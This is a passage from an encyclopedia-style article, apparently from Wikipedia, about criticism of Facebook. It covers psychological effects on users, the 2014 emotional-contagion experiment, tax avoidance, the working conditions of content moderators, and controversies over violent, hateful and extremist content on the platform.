Narcissistic users who show excessive grandiosity give negative emotion to viewers and cause envy, but as a result, that may cause viewers' loneliness. Viewers sometimes need to terminate relationships with them to avoid this negative emotion. However, this "avoidance" such as "terminate relationships" would be reinforcement and it may lead to loneliness. The cyclical pattern is a vicious circle of loneliness and avoidance coping, the study states.[201]

Divorce

Social networks, like Facebook, can have a detrimental effect on marriages, with users becoming worried about their spouse's contacts and relations with other people online, leading to marital breakdown and divorce.[202] According to a 2009 survey in the UK, around 20 percent of divorce petitions included references to Facebook.[203][204][205][206] Facebook has given us a new platform for interpersonal communication. Researchers proposed that high levels of Facebook use could result in Facebook-related conflict and breakup/divorce.[207] Previous studies have shown that romantic relationships can be damaged by excessive Internet use, Facebook jealousy, partner surveillance, ambiguous information, and online portrayal of intimate relationships.[208][209][210][211][212] Excessive Internet users reported having greater conflict in their relationships. Their partners feel neglected and there's lower commitment and lower feelings of passion and intimacy in the relationship. According to the article, researchers suspect that Facebook may contribute to an increase in divorce and infidelity rates in the near future due to the amount and ease of accessibility to connect with past partners.[207]

Stress

Research performed by psychologists from Edinburgh Napier University indicated that Facebook adds stress to users' lives. Causes of stress included fear of missing important social information, fear of offending contacts, discomfort or guilt from rejecting user requests or deleting unwanted contacts or being unfriended or blocked by Facebook friends or other users, the displeasure of having friend requests rejected or ignored, the pressure to be entertaining, criticism or intimidation from other Facebook users, and having to use appropriate etiquette for different types of friends.[213] Many people who started using Facebook for positive purposes or with positive expectations have found that the website has negatively impacted their lives.[214]

Next to that, the increasing number of messages and social relationships embedded in SNS also increases the amount of social information demanding a reaction from SNS users. Consequently SNS users perceive they are giving too much social support to other SNS friends. This dark side of SNS usage is called ‘social overload’. It is caused by the extent of usage, number of friends, subjective social support norms, and type of relationship (online-only vs offline friends) while age has only an indirect effect. The psychological and behavioral consequences of social overload include perceptions of SNS exhaustion, low user satisfaction, and high intentions to reduce or stop using SNS.[215]

Narcissism

In July 2018, a meta-analysis published in Psychology of Popular Media found that grandiose narcissism positively correlated with time spent on social media, frequency of status updates, number of friends or followers, and frequency of posting self-portrait digital photographs,[216] while a meta-analysis published in the Journal of Personality in April 2018 found that the positive correlation between grandiose narcissism and social networking service usage was replicated across platforms (including Facebook).[217] In March 2020, the Journal of Adult Development published a regression discontinuity analysis of 254 Millennial Facebook users investigating differences in narcissism and Facebook usage between the age cohorts born from 1977 to 1990 and from 1991 to 2000 and found that the later born Millennials scored significantly higher on both.[218] In June 2020, Addictive Behaviors published a systematic review finding a consistent, positive, and significant correlation between grandiose narcissism and the proposed category of psychological dependence called "problematic social media use".[219] Also in 2018, social psychologist Jonathan Haidt and FIRE President Greg Lukianoff noted in The Coddling of the American Mind that former Facebook president Sean Parker stated in a 2017 interview that the Like button was consciously designed to prime users receiving likes to feel a dopamine rush as part of a "social-validation feedback loop".[220]

Non-informing, knowledge-eroding medium

Facebook has, at least in the political field, a counter-effect on being informed: in two studies from the US with a total of more than 2,000 participants, the influence of social media on the general knowledge on political issues was examined in the context of two US presidential elections. The results showed that the frequency of Facebook use was moderately negatively related to general political knowledge. This was also the case when considering demographic, political-ideological variables and previous political knowledge. According to the latter, a causal relationship is indicated: the higher the Facebook use, the more the general political knowledge declines.[221] In 2018, social psychologist Jonathan Haidt and FIRE President Greg Lukianoff argued in The Coddling of the American Mind that the filter bubbles created by the News Feed algorithm of Facebook and other platforms are one of the principal factors amplifying political polarization in the United States since 2000 (when a majority of U.S. households first had at least one personal computer and then internet access the following year),[222][223] and Haidt and Tobias Rose-Stockwell suggested in The Atlantic in December 2019 that increased support in the United States among Millennials and Generation Z for communism and socialism stems from ignorance about the economic history of the 20th century.[224][225][226]

Other psychological effects

It has been admitted by many students that they have experienced bullying on the site, which leads to psychological harm. Students of high schools face a possibility of bullying and other adverse behaviors over Facebook every day. Many studies have attempted to discover whether Facebook has a positive or negative effect on children’s and teenagers’ social lives, and many of them have come to the conclusion that there are distinct social problems that arise with Facebook usage. British neuroscientist Susan Greenfield stuck up for the issues that children encounter on social media sites. She said that they can rewire the brain, which caused some hysteria over whether or not social networking sites are safe. She did not back up her claims with research, but did cause quite a few studies to be done on the subject. When that self is then broken down by others by badmouthing, criticism, harassment, criminalization or vilification, intimidation, demonization, demoralization, belittlement, or attacking someone over the site it can cause much of the envy, anger, or depression.[227][228][229][230]

Sherry Turkle, in her book Alone Together: Why We Expect More from Technology and Less from Each Other, argues that social media brings people closer and further apart at the same time. One of the main points she makes is that there is a high risk in treating persons online with dispatch like objects. Although people are networked on Facebook, their expectations of each other tend to be lessened. According to Turkle, this could cause a feeling of loneliness in spite of being together.[231]

Between 2016-2018, the number of 12- to 15-year-olds who reported being bullied over social media rose from 6% to 11%, in the region covered by Ofcom.[191]

User influence experiments

Academic and Facebook researchers have collaborated to test if the messages people see on Facebook can influence their behavior. For instance, in "A 61-Million-Person Experiment in Social Influence And Political Mobilization," during the 2010 elections, Facebook users were given the opportunity to "tell your friends you voted" by clicking on an "I voted" button. Users were 2% more likely to click the button if it was associated with friends who had already voted.[232]

Much more controversially, a 2014 study of "Emotional Contagion Through Social Networks" manipulated the balance of positive and negative messages seen by 689,000 Facebook users.[233] The researchers concluded that they had found "some of the first experimental evidence to support the controversial claims that emotions can spread throughout a network, [though] the effect sizes from the manipulations are small."[234]

Unlike the "I voted" study, which had presumptively beneficial ends and raised few concerns, this study was criticized for both its ethics and methods/claims. As controversy about the study grew, Adam Kramer, a lead author of both studies and member of the Facebook data team, defended the work in a Facebook update.[235] A few days later, Sheryl Sandburg, Facebook's COO, made a statement while traveling abroad. While at an Indian Chambers of Commerce event in New Delhi she stated that "This was part of ongoing research companies do to test different products, and that was what it was. It was poorly communicated and for that communication we apologize. We never meant to upset you."[236]

Shortly thereafter, on July 3, 2014, USA Today reported that the privacy watchdog group Electronic Privacy Information Center (EPIC) had filed a formal complaint with the Federal Trade Commission claiming that Facebook had broken the law when it conducted the study on the emotions of its users without their knowledge or consent. In its complaint, EPIC alleged that Facebook had deceived users by secretly conducting a psychological experiment on their emotions: "At the time of the experiment, Facebook did not state in the Data Use Policy that user data would be used for research purposes. Facebook also failed to inform users that their personal information would be shared with researchers."[237]

Beyond the ethical concerns, other scholars criticized the methods and reporting of the study's findings. John Grohol, writing for Psych Central, argued that despite its title and claims of "emotional contagion," this study did not look at emotions at all. Instead, its authors used an application (called "Linguistic Inquiry and Word Count" or LIWC 2007) that simply counted positive and negative words to infer users' sentiments. He wrote that a shortcoming of the LIWC tool is that it does not understand negations. Hence, the tweet "I am not happy" would be scored as positive: "Since the LIWC 2007 ignores these subtle realities of informal human communication, so do the researchers." Grohol concluded that given these subtleties, the effect size of the findings are little more than a "statistical blip."

Kramer et al. (2014) found a 0.07%—that's not 7 percent, that's 1/15th of one percent!!—decrease in negative words in people's status updates when the number of negative posts on their Facebook news feed decreased. Do you know how many words you'd have to read or write before you've written one less negative word due to this effect? Probably thousands.[238]

The consequences of the controversy are pending (be it FTC or court proceedings) but it did prompt an "Editorial Expression of Concern" from its publisher, the Proceedings of the National Academy of Sciences, as well as a blog posting from OkCupid titled "We experiment on human beings!"[239] In September 2014, law professor James Grimmelmann argued that the actions of both companies were "illegal, immoral, and mood-altering" and filed notices with the Maryland Attorney General and Cornell Institutional Review Board.[240]

In the UK, the study was also criticized by the British Psychological Society which said, in a letter to The Guardian, "There has undoubtedly been some degree of harm caused, with many individuals affected by increased levels of negative emotion, with consequent potential economic costs, increase in possible mental health problems and burden on health services. The so-called 'positive' manipulation is also potentially harmful."[241]

Tax avoidance

Facebook uses a complicated series of shell companies in tax havens to avoid paying billions of dollars in corporate tax.[242] According to The Express Tribune, Facebook is among the corporations that "avoided billions of dollars in tax using offshore companies."[243] For example, Facebook routes billions of dollars in profits using the Double Irish and Dutch Sandwich tax avoidance schemes to bank accounts in the Cayman Islands. The Dutch newspaper NRC Handelsblad concluded from the Paradise Papers published in late 2017 that Facebook pays "practically no taxes" worldwide.[244]

For example, Facebook paid:

  • In 2011, £2.9m tax on £840m profits in the UK;
  • In 2012 and 2013 no tax in the UK;
  • In 2014 £4,327 tax on hundreds of millions of pounds in UK revenues which were transferred to tax havens.[245]

According to economist and member of the PvdA delegation inside the Progressive Alliance of Socialists & Democrats in the European Parliament (S&D) Paul Tang, between 2013 and 2015 the EU lost an estimated €1,453m  €2,415m to Facebook.[246] When comparing to others countries outside the EU, the EU is only taxing Facebook with a rate of 0.03% to 0.1% of its revenue (around 6% of its EBT) whereas this rate is near 28% in countries outside the EU. Even had a rate between 2% and 5% been applied during this period - as suggested by the ECOFIN Council - a fraud of this rate by Facebook would have meant a loss to the EU between €327m and €817m.[246]

Revenue´s, profits, tax and effective tax rates, Facebook Inc. 2013-2015.[246]
Revenue (m EUR) EBT (m EUR) Tax (m EUR) Tax / EBT Tax / Revenue
Total EU Rest of the world Total EU Rest of the world Total EU Rest of the world Total EU Rest of the world Total EU Rest of the world
Facebook Inc. 2013 5,720 3,069 2,651 2,001 (4) 2,005 911 3 908 46% n.a 45% 15.93% 0.10% 34.25%
2014 10,299 5,017 5,282 4,057 (20) 4,077 1,628 5 1,623 40% n.a 40% 15.81% 0.09% 30.73%
2015 16,410 8,253 8,157 5,670 (43) 5,627 2,294 3 2,291 40% 6% 41% 13.98% 0.03% 28.09%

On July 6, 2016, the U.S. Department of Justice filed a petition in the U.S. District Court in San Francisco, asking for a court order to enforce an administrative summons issued to Facebook, Inc., under Internal Revenue Code section 7602,[247] in connection with an Internal Revenue Service examination of Facebook's year 2010 U.S. Federal income tax return.[248][249]

In November 2017, the Irish Independent recorded that for the 2016 financial year, Facebook had paid €30 million of Irish corporation tax on €12.6 billion of revenues that were routed through Ireland, giving an Irish effective tax rate of under 1%.[250] The €12.6 billion of 2016 Facebook revenues routed through Ireland was almost half of Facebook's global revenues.[251] In April 2018, Reuters wrote that all of Facebook's non–U.S. accounts were legally housed in Ireland for tax purposes, but were being moved due to the May 2018 EU GDPR regulations.[252]

In November 2018, the Irish Times reported that Facebook routed over €18.7 billion of revenues through Ireland (almost half all global revenues), on which it paid €38 million of Irish corporation tax.[253]

Treatment of employees and contractors

Moderators

Facebook hires some employees through contractors, including Accenture, Arvato, Cognizant, CPL Resources, and Genpact, to serve as content moderators, reviewing potentially problematic content posted to both Facebook and Instagram.[258] Many of these contractors face unrealistic expectations, harsh working conditions, and constant exposure to disturbing content, including graphic violence, animal abuse, and child pornography.[254][255] Contractor employment is contingent on achieving and maintaining a score of 98 on a 100-point scale on a metric known as "accuracy". Falling below a score of 98 can result in dismissal. Some have reported posttraumatic stress disorder (PTSD) stemming from lack of access to counseling, coupled with unforgiving expectations and the violent content they are assigned to review.[254]

Content moderator Keith Utley, who was employed by Cognizant, experienced a heart attack during work in March 2018; the office lacked a defibrillator, and Utley was transported to a hospital where he died.[256][259] Selena Scola, an employee of contractor Pro Unlimited, Inc., sued her employer after she developed PTSD as a result of "constant and unmitigated exposure to highly toxic and extremely disturbing images at the workplace".[260] In December 2019, former Cpl employee Chris Gray began legal action in the High Court of Ireland, claiming damages for PTSD suffered as a moderator,[261] the first of an estimated 20+ pending cases. In February 2020, employees in Tampa, Florida filed a lawsuit against Facebook and Cognizant alleging they developed PTSD and related mental health impairments as a result of constant and unmitigated exposure to disturbing content.[262]

In February 2020, the European Union Commissioners criticized the plans that Facebook has for dealing with the working conditions of those who are contracted to moderate content on the social media platform.[263]

Facebook agreed to settle a class action lawsuit for $52 million on May 12, 2020, which included a $1,000 payment to each of the 11,250 moderators in the class, with additional compensation available for the treatment of PTSD and other conditions resulting from the jobs.[264][265][266]

Employees

Plans for a Facebook-owned real estate development known as "Willow Village" have been criticized for resembling a "company town", which often curtails the rights of residents, and encourages or forces employees to remain within an environment created and monitored by their employer outside of work hours.[267] Critics have referred to the development as "Zucktown" and "Facebookville" and the company has faced additional criticism for the effect it will have on existing communities in California.

Misleading campaign against Google

In May 2011, emails were sent to journalists and bloggers making critical allegations about Google's privacy policies; however, it was later discovered that the anti-Google campaign, conducted by PR giant Burson-Marsteller, was paid for by Facebook in what CNN referred to as "a new level skullduggery" and which Daily Beast called a "clumsy smear". While taking responsibility for the campaign, Burson-Marsteller said it should not have agreed to keep its client's (Facebook's) identity a secret. "Whatever the rationale, this was not at all standard operating procedure and is against our policies, and the assignment on those terms should have been declined", it said in a statement.[268]

Content

An example of a Facebook post censored due to an unspecified conflict with "Community Standards".
Error message generated by Facebook for an attempt to share a link to a website that is censored due to Community Standards in a private chat. Messages containing certain links will not be delivered to the recipient.

Facebook has been criticized for removing or allowing various content (posts, photos and entire groups and profiles).

Intellectual property infringement

Facebook has also been criticized for having lax enforcement of third-party copyrights for videos uploaded to the service. In 2015, some Facebook pages were accused of plagiarizing videos from YouTube users and re-posting them as their own content using Facebook's video platform, and in some cases, achieving higher levels of engagement and views than the original YouTube post. Videos hosted by Facebook are given a higher priority and prominence within the platform and its user experience (including direct embedding within the News Feed and pages), giving a disadvantage to posting it as a link to the original external source.[269][270] In August 2015, Facebook announced a video-matching technology aiming to identify reposted videos, and also stated its intention to improve its procedures to remove infringing content faster.[271] In April 2016, Facebook implemented a feature known as "Rights Manager", which allows rights holders to manage and restrict the upload of their content onto the service by third-parties.[272]

Violent content

In 2013, Facebook was criticized for allowing users to upload and share videos depicting violent content, including clips of people being decapitated. Having previously refused to delete such clips under the guideline that users have the right to depict the "world in which we live", Facebook changed its stance in May, announcing that it would remove reported videos while evaluating its policy.[273] The following October, Facebook stated that it would allow graphic videos on the platform, as long as the intention of the video was to "condemn, not glorify, the acts depicted",[274] further stating that "Sometimes, those experiences and issues involve graphic content that is of public interest or concern, such as human rights abuses, acts of terrorism, and other violence. When people share this type of graphic content, it is often to condemn it. If it is being shared for sadistic pleasure or to celebrate violence, Facebook removes it."[275] However, Facebook once again received criticism, with the Family Online Safety Institute saying that such videos "crossed a line" and can potentially cause psychological damage among young Facebook users,[274] and then-Prime Minister of the United Kingdom David Cameron calling the decision "irresponsible", citing the same concerns regarding young users.[275] Two days later, Facebook removed a video of a beheading following "worldwide outrage", and while acknowledging its commitment to allowing people to upload gory material for the purpose of condemnation, it also stated that it would be further strengthening its enforcement to prevent glorification.[275] The company's policies were also criticized as part of these developments, with some drawing particular attention to Facebook's permission of graphic content but potential removal of breastfeeding images.[276] In January 2015, Facebook announced that new warnings would be displayed on graphic content, requiring users to explicitly confirm that they wish to see the material.[277][278]

War crimes

Facebook has been criticized for failing to take down violent content depicting war crimes in Libya. A 2019 investigation by the BBC[279] found evidence of alleged war crimes in Libya being widely shared on Facebook and YouTube. The BBC found images and videos on social media of the bodies of fighters and civilians being desecrated by fighters from the self-styled Libyan National Army. The force, led by General Khalifa Haftar, controls a swathe of territory in the east of Libya and is trying to seize the capital, Tripoli. BBC Arabic found almost one hundred images and videos from Libya shared on Facebook and YouTube, in violation of their companies’ guidelines.[280] The UK Foreign Office said it took the allegations extremely seriously and is concerned about the impact the recent violence is having on the civilian population.

In 2017, a Facebook video of Libyan National Army (LNA) special forces commander Mahmoud al-Werfalli was uploaded showing him shooting dead three captured fighters. The video was then shared on YouTube over ten thousand times. The International Criminal Court used it as evidence to indict al-Werfalli for the war crime of murder.[281] The BBC found the original video was still on Facebook 2 years after his indictment and also discovered videos showing the bodies of civilians being desecrated. These were taken in Ganfouda, a district of Benghazi which was under siege by the LNA between 2016-2017. More than 300 people, including dozens of children died during the siege. A video uncovered by BBC Arabic showed soldiers mocking a pile of corpses of dead civilians and trampling on bodies. Among them was a 77 year old woman, Alia Hamza. Her son, Ali Hamza had five family members killed in Ganfouda.

Ali Hamza told BBC Arabic, “I sent links to lawyers to send to the ICC in the Hague against Khalifa Haftar and his military commanders regarding the massacres of civilians,” said Hamza. In the video, the LNA soldiers label the civilians as terrorists. Human rights lawyer and war crimes specialist Rodney Dixon QC reviewed the evidence BBC Arabic found. “If groups are using those platforms to propagate their campaigns then those platforms should seriously look at their role because they could then be assisting in that process of further crimes being committed,” he said. After presenting our findings to Facebook they removed all the videos that show a suspected war crime taking place. However, they opted not to suspend any of the accounts which we found linked to the images. Erin Saltman, Facebook's policy manager for Counterterrorism in Europe, Middle East and Africa, told BBC Arabic, “Sometimes there are very conflicting narratives of whether or not the victim is a terrorist, or whether it's a civilian over who's committing that act, we cannot be the pure arbiters of truth.”[280] But Facebook and Youtube’s own community guidelines explicitly prohibit content that promotes or depicts acts of violence.[282]

Facebook Live

Facebook Live, introduced in August 2015 for celebrities[283] and gradually rolled out for regular users starting in January 2016,[284][285] lets users broadcast live videos, with Facebook's intention for the feature to be presenting public events or private celebrations.[286] However, the feature has been used to record multiple crimes, deaths, and violent incidents, causing significant media attention.[287][288][289][290][291][292][293][294]

Facebook has received criticism for not removing videos faster,[295] and Facebook Live has been described as a "monster [Facebook] cannot tame"[296] and "a gruesome crime scene for murders".[297] In response, CEO Mark Zuckerberg announced in May 2017 that the company would hire 3,000 people to review content and invest in tools to remove videos faster.[298][299][300]

Pro-anorexia groups

In 2008, Facebook was criticized for hosting groups dedicated to promoting anorexia. The groups promoted dramatic weight loss programs, shared extreme diet tips, and posted pictures of emaciated girls under "Thinspiration" headlines. Members reported having switched to Facebook from Myspace, another social networking service, due to a perceived higher level of safety and intimacy at Facebook.[301] In a statement to BBC News, a Facebook spokesperson stated that "Many Facebook groups relate to controversial topics; this alone is not a reason to disable a group. In cases where content is reported and found to violate the site's terms of use, Facebook will remove it."[302]

Pro-mafia groups' case

In Italy in 2009, the discovery of pro-mafia groups, one of them claiming Bernardo Provenzano's sainthood, caused an alert in the country[303][304][305] and brought the government to rapidly issue a law that would force Internet service providers to deny access to entire websites in case of refused removal of illegal contents. The amendment was passed by the Italian Senate and now needs to be passed unchanged by the Chamber of Deputies to become effective.[306][307][308]

Facebook criticized the government's efforts, telling Bloomberg that it "would be like closing an entire railway network just because of offensive graffiti at one station", and that "Facebook would always remove any content promoting violence and already had a takedown procedure in place."[309]

Trolling

On March 31, 2010, The Today Show ran a segment detailing the deaths of three separate adolescent girls and trolls' subsequent reactions to their deaths. Shortly after the suicide of high school student Alexis Pilkington, anonymous posters began trolling for reactions across various message boards, referring to Pilkington as a "suicidal CUSS", and posting graphic images on her Facebook memorial page. The segment also included an exposé of a 2006 accident, in which an eighteen-year-old student out for a drive fatally crashed her father's car into a highway pylon; trolls emailed her grieving family the leaked pictures of her mutilated corpse.[310]

There have been cases where Facebook "trolls" were jailed for their communications on Facebook, particularly memorial pages. In Autumn 2010, Colm Coss of Ardwick, Britain, was sentenced to 26 weeks in jail under s127 of the Communications Act 2003 of Great Britain,[311] for "malicious communications" for leaving messages deemed obscene and hurtful on Facebook memorial pages.[312][313]

In April 2011, Bradley Paul Hampson was sentenced to three years in jail after pleading guilty to two counts of using a carriage service (the Internet) to cause offense, for posts on Facebook memorial pages, and one count each of distributing and possessing child pornography when he posted images on the memorial pages of the deceased with phalluses superimposed alongside phrases such as "Woot I'm dead".[314][315]

Rape pages

A series of pro-rape and 'rape joke' content on Facebook drew attention from the media and women's groups.[316] Rape Is No Joke (RINJ), a group opposing the pages, argued that removing "pro-rape" pages from Facebook and other social media was not a violation of free speech in the context of Article 19 of the Universal Declaration of Human Rights and the concepts recognized in international human rights law in the International Covenant on Civil and Political Rights.[317] RINJ repeatedly challenged Facebook to remove the rape pages.[318] RINJ then turned to advertisers on Facebook telling them not to let their advertising be posted on Facebook's 'rape pages'.[319]

Following a campaign that involved the participation of Women, Action and the Media, the Everyday Sexism Project and the activist Soraya Chemaly, who were among 100 advocacy groups, Facebook agreed to update its policy on hate speech. The campaign highlighted content that promoted domestic and sexual violence against women, and used over 57,000 tweets and more than 4,900 emails to create outcomes such as the withdrawal of advertising from Facebook by 15 companies, including Nissan UK, House of Burlesque and Nationwide UK. The social media website initially responded by stating that "While it may be vulgar and offensive, distasteful content on its own does not violate our policies",[320] but then agreed to take action on May 29, 2013 after it had "become clear that our systems to identify and remove hate speech have failed to work as effectively as we would like, particularly around issues of gender-based hate".[321]

Child abuse images

In June 2015, the UK National Society for the Prevention of Cruelty to Children raised concerns about Facebook's apparent refusal when asked to remove controversial video material which allegedly showed a baby in emotional distress.[322]

In March 2017, BBC News reported in an investigation that Facebook only removed 18 of the 100 groups and posts it had reported for containing child exploitation images. The BBC had been granted an interview with Facebook policy director Simon Milner under the condition that they provide evidence of the activity. However, when presented with the images, Facebook canceled the interview, and told the BBC that it had been reported to the National Crime Agency for illegally distributing child exploitation images (the NCA could not confirm whether the BBC was actually being investigated).[323] Milner later stated to the BBC that the investigation had exposed flaws in its image moderation process that have since been addressed, and that all of the reported content was removed from the service.[324]

Objectification of women

In July 2017, GMA News reported that "a number" of secret Facebook groups that had been engaging in illegal activity of sharing "obscene" photos of women had been exposed, with the Philippine National Bureau of Investigation warning group members of the possibility of being liable for violating child pornography and anti-voyeurism laws. Facebook stated that it would remove the groups as violations of its community guidelines.[325] A few days later, GMA News had an interview with one of the female victims targeted by one of the groups, who stated that she received friend requests from strangers and inappropriate messages. After reporting to authorities, the Philippine National Police's anti-cybercrime unit promised to take action in finding the accounts responsible.[326] Senator Risa Hontiveros responded to the incidents with the proposal of a law that would impose "stiff penalties" on such group members, stating that "These people have no right to enjoy our internet freedom only to abuse our women and children. We will not allow them to shame our young women, suppress their right to express themselves through social media and contribute to a culture of misogyny and hate".[327]

Anti-Semitism

Facebook has been suspected of having a double standard when it comes to pages and posts regarding the Arab–Israeli conflict. When it comes to alleged incitement, Facebook has been accused of being unfair, removing only posts and pages that attack Palestinians, while turning a blind eye to similar posts that are violently anti-Semitic. The NGO Shurat Hadin-Israel Law Center conducted an experiment over the incitement issue, which sought to expose what it viewed as double standards regarding anti-Israel sentiment vis-a-vis the simultaneous launch of two Facebook pages: "Stop Palestinians" and "Stop Israel". Following the launch of the two nearly identical pages, the NGO posted hateful content simultaneously on both pages. Next, Shurat Hadin reported both faux-incitement pages to Facebook to see which, if either, would be removed. According to them, despite featuring nearly identical content, only one was removed from the online platform. They said the page inciting against Palestinians was closed by Facebook (on the same day that it was reported) for "containing credible threat of violence" which "violated our [Facebook's] community standards", but not the page inciting against Israelis. Shurat Hadin said that Facebook claimed that this page was "not in violation of Facebook's rules". Shurat Hadin's staged anti-Israel group "Stop Israel" still remains active on Facebook.[328] ProPublica stated in September 2017 that a website was able to target ads at Facebook users who were interested in "how to burn Jew" and "Jew hater". Facebook removed the categories and said it would try to stop them from appearing to potential advertisers.[329]

In March 2019, Facebook subsidiary Instagram declined to remove an anti-semitic image posted by right-wing conspiracy theorist Alex Jones, saying that it did not violate their community standards.[330]

Incitement of violence against Israelis

Facebook has been accused of being a public platform that is used to incite violence. In October 2015, 20,000 Israelis claimed that Facebook was ignoring Palestinian incitement on its platform and filed a class-action suit demanding that Facebook remove all posts "containing incitement to murder Jews".[331]

Israeli politicians have complained that Facebook does not comply or assist with requests from the police for tracking and reporting individuals when they share their intent to kill or commit any other act of violence on their Facebook pages. In June 2016, following the murder of Hallel Ariel, 13, by a terrorist who posted on Facebook, Israeli Minister of Public Security Gilad Erdan charged that "Facebook, which has brought a positive revolution to the world, has become a monster...The dialogue, the incitement, the lies of the young Palestinian generation are happening on the Facebook platform." Erdan accused Facebook of "sabotaging the work of Israeli police" and "refusing to cooperate" when Israel Police turns to the site for assistance. It also "sets a very high bar" for removing inciteful content.[332]

In July 2016, a civil action for $1 billion in damages was filed in the United States District Court for the Southern District of New York on behalf of the victims and family members of four Israeli-Americans and one US citizen killed by Hamas militants since June 2014.[333][334] The victims and plaintiffs in the case are the families of Yaakov Naftali Fraenkel, a 16-year-old who was kidnapped and murdered by Hamas operatives in 2014; Taylor Force, a 29-year-old American MBA student and US Army veteran killed in a stabbing spree in Jaffa in 2016; Chaya Braun, a three-month-old thrown from her stroller and slammed into the pavement when a Hamas attacker drove his car into a light rail station in Jerusalem in an October 2014; 76-year-old Richard Lakin who was killed in the October 2015 shooting and stabbing attack on a Jerusalem bus; and Menachem Mendel Rivkin, who was seriously wounded in a January 2016 stabbing attack in Jerusalem.[334] The plaintiffs claimed that Facebook knowingly provided its social media platform and communication services to Hamas in violation of provisions of US Anti-Terrorism laws which prohibits US businesses from providing any material support, including services, to designated terrorist groups and their leaders. The government of the United States has designated Hamas as a "Foreign Terrorist Organization" as defined by US law. The suit claims that Hamas "used and relied on Facebook's online social network platform and communications services to facilitate and carry out its terrorist activity, including the terrorist attacks in which Hamas murdered and injured the victims and their families in this case".[333][334] The legal claim was rejected; the court found that Facebook and other social media companies are not considered to be the publishers of material users post when digital tools used by the company match content with what the tool identifies as interested consumers.[335][336]

In August 2016, Israel's security service, the Shin Bet, reported that it had arrested nine Palestinians who had been recruited by the Lebanon-based Hezbollah terrorist organization. Operatives of Hezbollah in Lebanon and Gaza Strip recruited residents of the West Bank, Gaza and Israel through Facebook and other social media sites. After recruiting cell leaders on Facebook, Hezbollah and the recruits used encrypted communications to avoid detection, and the leaders continued to recruit other members. The terror cells received Hezbollah funding and planned to conduct suicide bombings and ambushes and had begun preparing explosive devices for attacks, said the security service, which claimed credit for preventing the attacks. The Shin Bet said it also detected multiple attempts by Hezbollah to recruit Israeli Arabs through a Facebook profile.[337][338][339]

Currently, legislation is being prepared in Israel, allowing fines of 300,000 shekels for Facebook and other social media like Twitter and YouTube for every post inciting or praising terrorism that isn't removed within 48 hours, and could possibly lead to further acts of terrorism.[340]

Countermeasure efforts

In June 2017, Facebook published a blog post, offering insights into how it detects and combats terrorism content. The company claimed that the majority of the terrorism accounts that are found are discovered by Facebook itself, while it reviews reports of terrorism content "urgently", and, in cases of imminent harm, "promptly inform authorities". It also develops new tools to aid in its efforts, including the use of artificial intelligence to match terrorist images and videos, detecting when content is shared across related accounts, and developing technologies to stop repeat offenders. The company stated that it has 150 people dedicated to terrorism countermeasures, and works with governments and industries in an effort to curb terrorist propaganda. Its blog post stated that "We want Facebook to be a hostile place for terrorists."[341][342]

Employee data leak

In June 2017, The Guardian reported that a software bug had exposed the personal details of 1,000 Facebook workers involved in reviewing and removing terrorism content, by displaying their profiles in the "Activity" logs of Facebook groups related to terrorism efforts,. In Facebook's Dublin, Ireland headquarters, six individuals were determined to be "high priority" victims of the error, after the company concluded that their profiles were likely viewed by potential terrorists in groups such as ISIS, Hezbollah and the Kurdistan Workers' Party. The bug itself, discovered in November 2016 and fixed two weeks later, was active for one month, and had also been retroactively exposing censored personal accounts from August 2016. One affected worker had fled Ireland, gone into hiding, and only returned to Ireland after five months due to a lack of money. Suffering from psychological distress, he filed a legal claim against Facebook and CPL Resources, an outsourcing company, seeking compensation. A Facebook spokesperson stated that "Our investigation found that only a small fraction of the names were likely viewed, and we never had evidence of any threat to the people impacted or their families as a result of this matter", and Craig D’Souza, Facebook's head of global investigations, said: "Keep in mind that when the person sees your name on the list, it was in their activity log, which contains a lot of information [...] there is a good chance that they associate you with another admin of the group or a hacker". Facebook offered to install a home-alarm monitoring system, provide transport to and from work, and counseling through its employee assistance program. As a result of the data leak, Facebook is reportedly testing the use of alternative, administrative accounts for workers reviewing content, rather than requiring workers to sign in with their personal profiles.[343][344]

On October 26, 2018 social network Facebook announced that it has deleted 82 accounts created in Iran that included posts advocating harsh issues such as race, immigration, and U.S. President Donald Trump.[345]

Fake news

Facebook has been criticized for not doing enough to limit the spread of fake news stories on their site, especially after the 2016 United States presidential election, which some have claimed Donald Trump would not have won if Facebook had not helped spread what they claim to have been fake stories that were biased in his favor.[346] Mark Zuckerberg has begun to take steps to eliminate the prevalence of fake news on Facebook as a result of criticisms of Facebook's influence on the presidential election.[347] At a conference called Techonomy Mark Zuckerberg stated in regards to Donald Trump, "There's a profound lack of empathy in asserting that the only reason why someone could have voted the way that they did is because they saw some fake news". Zuckerberg affirms the idea that people do not stray from their own ideals and political leanings. He stated, "I don't know what to do about that" and, "When we started, the north star for us was: We're building a safe community".[348]

Zuckerberg has also been quoted in his own Facebook post, "Of all the content on Facebook, more than 99 percent of what people see is authentic".[349] In addition, The Pew Research Center, stated that "62% of Americans obtain some, or all, of their news on social media-the bulk of it from Facebook".[350] The former editor at Facebook leaked inflammatory information about the websites' algorithm's pointing to certain falsehoods and bias by the news created within Facebook. Although Facebook initially denied claims of issues with fake new stories and their algorithms, they fired the entire trending team involved with a fake news story about Megyn Kelly being a "closeted liberal".[351]

Incitement of violence in Sri Lanka

Sri Lankan telecommunications minister Harin Fernando stated that Facebook had been too slow removing content and banning users who were using its platforms to facilitate violence during the 2018 anti-Muslim riots in Sri Lanka.[352][353] Facebook stated that it is increasing the number of Sinhalese-speakers it employs to review content.[352]

Myanmar abuses

Facebook removed accounts owned by the Myanmar Armed Forces for inciting hatred against the Rohingya people,[354][355][356] and “engaging in coordinated inauthentic behavior.”[357]

Blue tick

Facebook grants blue tick to verified accounts of public personalities, brands, and celebrities (including politicians and artists). They have no policy in the cases where an individual who has a verified blue tick account is convicted in a serious criminal case. There has been a recent case in India where a politician was convicted and sentenced to 10 years in jail in a serious bribery criminal case but his FB page still continues to be verified.[358]

Neo-Nazi and white supremacist content

From c.2018 until 27 March 2019, Facebook's internal policy was to permit "white nationalist" content but not "white supremacist" content, despite advice stating there is no distinction.[359] In practice, it hosted much white supremacist and neo-Nazi content.[360] On 27 March 2019, Facebook backtracked and stated that white nationalism "cannot be meaningfully separated from white supremacy and organized hate groups".[359]

Technical

Real-name policy controversy and compromise

